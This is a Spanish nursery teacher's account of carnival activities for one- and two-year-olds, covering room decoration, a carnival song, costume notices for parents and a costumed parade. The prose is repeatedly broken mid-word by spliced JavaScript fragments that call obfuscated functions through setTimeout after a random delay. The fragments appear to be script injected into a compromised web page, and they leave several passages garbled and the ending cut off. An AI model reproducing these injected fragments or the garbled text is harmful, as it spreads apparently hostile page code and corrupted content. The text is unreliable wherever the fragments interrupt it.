VIVIMOS EL CARNAVAL. EXPERIENCIA EN EL AULA

Autora: Manuela González Castaño

         El carnaval constituye una de las fechas más especiales para los pequeños, que entusiasman a todos. Les gusta el color, los disfraces, la música…y, por eso, es fundamental que en una etapa como la infantil, se trabaje esta fiesta.


         Esta experiencia se realiza en centro infantil que cuenta con 15 niños y niñas de 1 año y 14 niños y niñas de 2 años.


         Durante quince días aproximadamente vamos ambientandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando el aula con diferentes elementos de carnaval: colores, dibujos, música… y les vamos explicandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando a los niños y niñas que el carnaval se acerca, que nos vamos a disfrazar, les enseñamos algunas caretas, pelucas…y  les dejamos que se las pongan y que se miren en el espejo. También aprendemos canciones del carnaval. Una de ellas, por ejemplo, es:


“Un día al colegio, llegó mi mamá,


Cogió un papel, se fue a dibujar.


Y yo me pregunto: ¿Qué es lo que hará?


Si viene a aprender la “e” o la “a”.


La seño decía: ¡esto es carnaval!


Hay que divertirse, reír y cantar,


Me habló de disfraces, juegos y pintar,


Y mira que chuli me ha puesto mamá.”


        Tres días antes del pasacalle también disfrazaremos a los niños y niñas en este centro infantil. Siempre, el día antes avisaremos a los padres y madres con un cartel en la entrada donde se darán las indicaciones de lo que los niños deberán traer al día siguiente para disfrazarse. Por ejemplo:


-         “MAÑANA INDIO SERÁS. CON CINTILLO Y PLUMA VENDRÁS”. Luego nosotros les disfrazaremos con lo que los niños y niñas lleven y les pintaremos dos o tres rayas en las mejillas como si fueran indios.


-         “MAÑANA PAYASETE SERÁS. CON SOMBRERO Y CORBATA VENDRÁS”.  En esta ocasión les pintaremos las caras como si fueran payasetes: nariz roja, boca grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande…


-         “MAÑANA, SI QUIERES PRESUMIR, CON UN DELANTAL TIENES QUE VENIR”. Y nosotras les pondremos un gorrito de cocinero.


         El día del pasacalle los niños y niñas entrarán en el centro vestidos de blanco, con leotardos y camisetas, zapatillas de deporte y el pelo suelto para las niñas, sin horquillas ni coletas.


         La familia de los alumnos no conoce de qué disfrazaremos a sus hijos. En una reunión que hicimos un mes antes de estas fechas, les pedimos a los padres 7€ por cada niño. Las educadoras nos encargamos de buscar un disfraz y comprarlo para todos los niños y niñas. En este caso ha sido de vaquita.


         Cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}